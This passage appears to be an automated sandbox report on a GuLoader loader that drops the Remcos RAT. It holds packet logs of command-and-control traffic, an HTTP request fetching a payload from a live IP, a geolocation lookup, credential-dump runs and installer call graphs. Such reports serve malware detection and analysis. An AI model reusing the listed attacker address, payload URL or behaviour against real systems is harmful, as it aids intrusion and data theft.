                                                          Sep 27, 2024 12:58:47.467730999 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467751980 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467772961 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467806101 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.467848063 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.467868090 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467890978 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467911959 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467932940 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467952967 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.467978001 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.467981100 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.468022108 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.468029976 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.468107939 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.468238115 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.469239950 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.469917059 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.469994068 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.470032930 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.470177889 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.494667053 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.576145887 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576284885 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576404095 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576462984 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576522112 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576586008 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.576622009 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576704979 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576831102 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576894999 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.576956987 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577013016 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577043056 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577068090 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577161074 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577219009 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577234983 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577286959 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577311993 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577369928 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577410936 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577430964 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577488899 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577522039 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577543974 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577608109 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577640057 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577663898 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577719927 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577812910 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577832937 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577869892 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577898026 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.577931881 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.577986956 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:47.578041077 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:47.578202963 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:50.985071898 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:51.102112055 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:51.102164030 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:51.102327108 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:51.102467060 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:58:51.217374086 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:51.217438936 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:51.217448950 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:51.222552061 CEST27004978666.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:58:51.222700119 CEST497862700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:59:06.306741953 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:59:06.318494081 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:59:06.478435993 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:59:36.322304010 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 12:59:36.324668884 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 12:59:36.490149021 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:06.334053993 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:06.337019920 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:06.506661892 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:33.560115099 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:33.560127974 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:33.675352097 CEST804978366.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:33.675576925 CEST4978380192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:34.044326067 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:34.997214079 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:36.344964027 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:36.346700907 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:00:36.506958961 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:00:36.887522936 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:40.652240992 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:00:48.184223890 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:01:03.225425959 CEST4978580192.168.11.20178.237.33.50
                                                          Sep 27, 2024 13:01:06.354752064 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:01:06.357554913 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:01:06.516073942 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:01:36.443008900 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:01:36.445969105 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:01:36.617553949 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:06.529062033 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:06.530972004 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:02:06.693042040 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:36.556691885 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:02:36.558849096 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:02:36.728075027 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:06.578299046 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:06.580902100 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:03:06.750124931 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:36.598783970 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:03:36.645076036 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:03:36.702693939 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:03:36.864204884 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:06.599879980 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:06.654134989 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:06.735706091 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:06.898937941 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:36.614609957 CEST27004978466.150.198.142192.168.11.20
                                                          Sep 27, 2024 13:04:36.663201094 CEST497842700192.168.11.2066.150.198.142
                                                          Sep 27, 2024 13:04:36.738317013 CEST497842700192.168.11.2066.150.198.142
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 12:58:45.897576094 CEST | 61130 | 53 | 192.168.11.20 | 1.1.1.1
Sep 27, 2024 12:58:46.007960081 CEST | 53 | 61130 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 27, 2024 12:58:45.897576094 CEST | 192.168.11.20 | 1.1.1.1 | 0x1868 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 27, 2024 12:58:46.007960081 CEST | 1.1.1.1 | 192.168.11.20 | 0x1868 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                          • 66.150.198.142
                                                          • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49783 | 66.150.198.142 | 80 | 6512 | C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 12:58:43.691420078 CEST | 181 | OUT | GET /lOqpXUmQJccVjyn149.bin HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                          Host: 66.150.198.142
                                                          Cache-Control: no-cache
Sep 27, 2024 12:58:43.810106993 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Fri, 27 Sep 2024 08:40:56 GMT
                                                          Accept-Ranges: bytes
                                                          ETag: "96972ff8b810db1:0"
                                                          Server: Microsoft-IIS/10.0
                                                          Date: Fri, 27 Sep 2024 10:58:43 GMT
                                                          Content-Length: 494656


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49785 | 178.237.33.50 | 80 | 6512 | C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 12:58:46.200033903 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                          Host: geoplugin.net
                                                          Cache-Control: no-cache
Sep 27, 2024 12:58:46.394920111 CEST | 1171 | IN | HTTP/1.1 200 OK
                                                          date: Fri, 27 Sep 2024 10:58:46 GMT
                                                          server: Apache
                                                          content-length: 963
                                                          content-type: application/json; charset=utf-8
                                                          cache-control: public, max-age=300
                                                          access-control-allow-origin: *
                                                          Data Ascii: { "geoplugin_request":"79.127.132.20", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Ashburn", "geoplugin_region":"Virginia", "geoplugin_regionCode":"VA", "geoplugin_regionName":"Virginia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"39.0469", "geoplugin_longitude":"-77.4903", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                          Target ID:0
                                                          Start time:06:58:19
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.316846928075.0000000007E80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:06:58:33
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:3
                                                          Start time:06:58:47
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:06:58:47
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:06:58:47
                                                          Start date:27/09/2024
                                                          Path:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"
                                                          Imagebase:0x400000
                                                          File size:814'515 bytes
                                                          MD5 hash:50AD24C74502951D0BEC1507CA050C46
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:27.5%
                                                            Dynamic/Decrypted Code Coverage:30%
                                                            Signature Coverage:18.4%
                                                            Total number of Nodes:700
                                                            Total number of Limit Nodes:17
1000174b GlobalFree 2975->2977 2976->2965 2977->2965 2978 10002a77 2979 10002a8f 2978->2979 2980 1000158f 2 API calls 2979->2980 2981 10002aaa 2980->2981 2982 402dd7 2983 402e02 2982->2983 2984 402de9 SetTimer 2982->2984 2985 402e57 2983->2985 2986 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 2983->2986 2984->2983 2986->2985 2987 10002238 2988 10002296 2987->2988 2989 100022cc 2987->2989 2988->2989 2990 100022a8 GlobalAlloc 2988->2990 2990->2988 2991 10001058 2993 10001074 2991->2993 2992 100010dd 2993->2992 2994 10001092 2993->2994 2995 10001516 GlobalFree 2993->2995 2996 10001516 GlobalFree 2994->2996 2995->2994 2997 100010a2 2996->2997 2998 100010b2 2997->2998 2999 100010a9 GlobalSize 2997->2999 3000 100010b6 GlobalAlloc 2998->3000 3001 100010c7 2998->3001 2999->2998 3002 1000153d 3 API calls 3000->3002 3003 100010d2 GlobalFree 3001->3003 3002->3001 3003->2992 2680 10001759 2681 10001789 2680->2681 2722 10001b18 2681->2722 2683 10001790 2684 100018a6 2683->2684 2685 100017a1 2683->2685 2686 100017a8 2683->2686 2770 10002286 2685->2770 2754 100022d0 2686->2754 2691 1000180c 2695 10001812 2691->2695 2696 1000184e 2691->2696 2692 100017ee 2783 100024a4 2692->2783 2693 100017d7 2705 100017cd 2693->2705 2780 10002b57 2693->2780 2694 100017be 2698 100017c4 2694->2698 2704 100017cf 2694->2704 2700 100015b4 3 API calls 2695->2700 2702 100024a4 10 API calls 2696->2702 2698->2705 2764 1000289c 2698->2764 2707 10001828 2700->2707 2713 10001840 2702->2713 2703 100017f4 2794 100015b4 2703->2794 2774 10002640 2704->2774 2705->2691 2705->2692 2710 100024a4 10 API calls 2707->2710 2709 100017d5 2709->2705 2710->2713 2714 10001895 2713->2714 2805 10002467 2713->2805 2714->2684 2716 1000189f GlobalFree 2714->2716 2716->2684 2719 10001881 2719->2714 2809 1000153d wsprintfW 2719->2809 2720 1000187a FreeLibrary 2720->2719 2812 1000121b GlobalAlloc 2722->2812 2724 10001b3c 2813 1000121b GlobalAlloc 2724->2813 2726 10001d7a GlobalFree GlobalFree GlobalFree 2727 10001d97 
2726->2727 2745 10001de1 2726->2745 2728 100020ee 2727->2728 2736 10001dac 2727->2736 2727->2745 2730 10002110 GetModuleHandleW 2728->2730 2728->2745 2729 10001c1d GlobalAlloc 2750 10001b47 2729->2750 2731 10002121 LoadLibraryW 2730->2731 2732 10002136 2730->2732 2731->2732 2731->2745 2820 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2732->2820 2733 10001c68 lstrcpyW 2737 10001c72 lstrcpyW 2733->2737 2734 10001c86 GlobalFree 2734->2750 2736->2745 2816 1000122c 2736->2816 2737->2750 2738 10002188 2740 10002195 lstrlenW 2738->2740 2738->2745 2739 10002048 2739->2745 2746 10002090 lstrcpyW 2739->2746 2821 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 2740->2821 2742 10002148 2742->2738 2753 10002172 GetProcAddress 2742->2753 2745->2683 2746->2745 2747 10001cc4 2747->2750 2814 1000158f GlobalSize GlobalAlloc 2747->2814 2748 10001f37 GlobalFree 2748->2750 2749 100021af 2749->2745 2750->2726 2750->2729 2750->2733 2750->2734 2750->2737 2750->2739 2750->2745 2750->2747 2750->2748 2752 1000122c 2 API calls 2750->2752 2819 1000121b GlobalAlloc 2750->2819 2752->2750 2753->2738 2755 100022e8 2754->2755 2756 1000122c GlobalAlloc lstrcpynW 2755->2756 2758 10002410 GlobalFree 2755->2758 2759 100023ba GlobalAlloc CLSIDFromString 2755->2759 2760 1000238f GlobalAlloc WideCharToMultiByte 2755->2760 2763 100023d9 2755->2763 2823 100012ba 2755->2823 2756->2755 2758->2755 2761 100017ae 2758->2761 2759->2758 2760->2758 2761->2693 2761->2694 2761->2705 2763->2758 2827 100025d4 2763->2827 2766 100028ae 2764->2766 2765 10002953 EnumWindows 2767 10002971 2765->2767 2766->2765 2768 10002a62 GetLastError 2767->2768 2769 10002a6d 2767->2769 2768->2769 2769->2705 2771 10002296 2770->2771 2773 100017a7 2770->2773 2772 100022a8 GlobalAlloc 2771->2772 2771->2773 2772->2771 2773->2686 2777 1000265c 2774->2777 2775 100026c0 2778 100026c5 GlobalSize 2775->2778 2779 100026cf 2775->2779 2776 100026ad GlobalAlloc 
2776->2779 2777->2775 2777->2776 2778->2779 2779->2709 2781 10002b62 2780->2781 2782 10002ba2 GlobalFree 2781->2782 2830 1000121b GlobalAlloc 2783->2830 2785 10002506 MultiByteToWideChar 2790 100024ae 2785->2790 2786 1000252b StringFromGUID2 2786->2790 2787 1000253c lstrcpynW 2787->2790 2788 1000254f wsprintfW 2788->2790 2789 1000256c GlobalFree 2789->2790 2790->2785 2790->2786 2790->2787 2790->2788 2790->2789 2791 100025a7 GlobalFree 2790->2791 2792 10001272 2 API calls 2790->2792 2831 100012e1 2790->2831 2791->2703 2792->2790 2835 1000121b GlobalAlloc 2794->2835 2796 100015ba 2798 100015e1 2796->2798 2799 100015c7 lstrcpyW 2796->2799 2800 100015fb 2798->2800 2801 100015e6 wsprintfW 2798->2801 2799->2800 2802 10001272 2800->2802 2801->2800 2803 100012b5 GlobalFree 2802->2803 2804 1000127b GlobalAlloc lstrcpynW 2802->2804 2803->2713 2804->2803 2806 10002475 2805->2806 2808 10001861 2805->2808 2807 10002491 GlobalFree 2806->2807 2806->2808 2807->2806 2808->2719 2808->2720 2810 10001272 2 API calls 2809->2810 2811 1000155e 2810->2811 2811->2714 2812->2724 2813->2750 2815 100015ad 2814->2815 2815->2747 2822 1000121b GlobalAlloc 2816->2822 2818 1000123b lstrcpynW 2818->2745 2819->2750 2820->2742 2821->2749 2822->2818 2824 100012c1 2823->2824 2825 1000122c 2 API calls 2824->2825 2826 100012df 2825->2826 2826->2755 2828 100025e2 VirtualAlloc 2827->2828 2829 10002638 2827->2829 2828->2829 2829->2763 2830->2790 2832 100012ea 2831->2832 2833 1000130c 2831->2833 2832->2833 2834 100012f0 lstrcpyW 2832->2834 2833->2790 2834->2833 2835->2796 2836 403d1b 2837 403d33 2836->2837 2838 403e6e 2836->2838 2837->2838 2839 403d3f 2837->2839 2840 403ebf 2838->2840 2841 403e7f GetDlgItem GetDlgItem 2838->2841 2843 403d4a SetWindowPos 2839->2843 2844 403d5d 2839->2844 2842 403f19 2840->2842 2853 401389 2 API calls 2840->2853 2845 4041f4 18 API calls 2841->2845 2847 404240 SendMessageW 2842->2847 2867 403e69 2842->2867 2843->2844 2848 403d62 ShowWindow 2844->2848 2849 403d7a 2844->2849 2846 
403ea9 SetClassLongW 2845->2846 2850 40140b 2 API calls 2846->2850 2863 403f2b 2847->2863 2848->2849 2851 403d82 DestroyWindow 2849->2851 2852 403d9c 2849->2852 2850->2840 2906 40417d 2851->2906 2854 403da1 SetWindowLongW 2852->2854 2855 403db2 2852->2855 2856 403ef1 2853->2856 2854->2867 2858 403e5b 2855->2858 2859 403dbe GetDlgItem 2855->2859 2856->2842 2860 403ef5 SendMessageW 2856->2860 2857 40417f DestroyWindow EndDialog 2857->2906 2916 40425b 2858->2916 2864 403dd1 SendMessageW IsWindowEnabled 2859->2864 2869 403dee 2859->2869 2860->2867 2861 40140b 2 API calls 2861->2863 2862 4041ae ShowWindow 2862->2867 2863->2857 2863->2861 2866 406281 17 API calls 2863->2866 2863->2867 2872 4041f4 18 API calls 2863->2872 2897 4040bf DestroyWindow 2863->2897 2907 4041f4 2863->2907 2864->2867 2864->2869 2866->2863 2868 403df3 2913 4041cd 2868->2913 2869->2868 2870 403dfb 2869->2870 2873 403e42 SendMessageW 2869->2873 2874 403e0e 2869->2874 2870->2868 2870->2873 2872->2863 2873->2858 2876 403e16 2874->2876 2877 403e2b 2874->2877 2875 403e29 2875->2858 2879 40140b 2 API calls 2876->2879 2878 40140b 2 API calls 2877->2878 2880 403e32 2878->2880 2879->2868 2880->2858 2880->2868 2882 403fa6 GetDlgItem 2883 403fc3 ShowWindow KiUserCallbackDispatcher 2882->2883 2884 403fbb 2882->2884 2910 404216 KiUserCallbackDispatcher 2883->2910 2884->2883 2886 403fed EnableWindow 2891 404001 2886->2891 2887 404006 GetSystemMenu EnableMenuItem SendMessageW 2888 404036 SendMessageW 2887->2888 2887->2891 2888->2891 2890 403cfc 18 API calls 2890->2891 2891->2887 2891->2890 2911 404229 SendMessageW 2891->2911 2912 40625f lstrcpynW 2891->2912 2893 404065 lstrlenW 2894 406281 17 API calls 2893->2894 2895 40407b SetWindowTextW 2894->2895 2896 401389 2 API calls 2895->2896 2896->2863 2898 4040d9 CreateDialogParamW 2897->2898 2897->2906 2899 40410c 2898->2899 2898->2906 2900 4041f4 18 API calls 2899->2900 2901 404117 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2900->2901 2902 401389 2 API calls 
2901->2902 2903 40415d 2902->2903 2903->2867 2904 404165 ShowWindow 2903->2904 2905 404240 SendMessageW 2904->2905 2905->2906 2906->2862 2906->2867 2908 406281 17 API calls 2907->2908 2909 4041ff SetDlgItemTextW 2908->2909 2909->2882 2910->2886 2911->2891 2912->2893 2914 4041d4 2913->2914 2915 4041da SendMessageW 2913->2915 2914->2915 2915->2875 2917 404273 GetWindowLongW 2916->2917 2927 4042fc 2916->2927 2918 404284 2917->2918 2917->2927 2919 404293 GetSysColor 2918->2919 2920 404296 2918->2920 2919->2920 2921 4042a6 SetBkMode 2920->2921 2922 40429c SetTextColor 2920->2922 2923 4042c4 2921->2923 2924 4042be GetSysColor 2921->2924 2922->2921 2925 4042d5 2923->2925 2926 4042cb SetBkColor 2923->2926 2924->2923 2925->2927 2928 4042e8 DeleteObject 2925->2928 2929 4042ef CreateBrushIndirect 2925->2929 2926->2925 2927->2867 2928->2929 2929->2927 3010 1000103d 3011 1000101b 5 API calls 3010->3011 3012 10001056 3011->3012

                                                            Control-flow Graph

                                                            APIs
                                                            • SetErrorMode.KERNELBASE ref: 00403373
                                                            • GetVersion.KERNEL32 ref: 00403379
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
                                                            • OleInitialize.OLE32(00000000), ref: 004033F0
                                                            • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
                                                            • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
                                                            • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000000,?,00000006,00000008,0000000A), ref: 00403434
                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",00000020,?,00000006,00000008,0000000A), ref: 0040345B
                                                              • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                              • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B2
                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CE
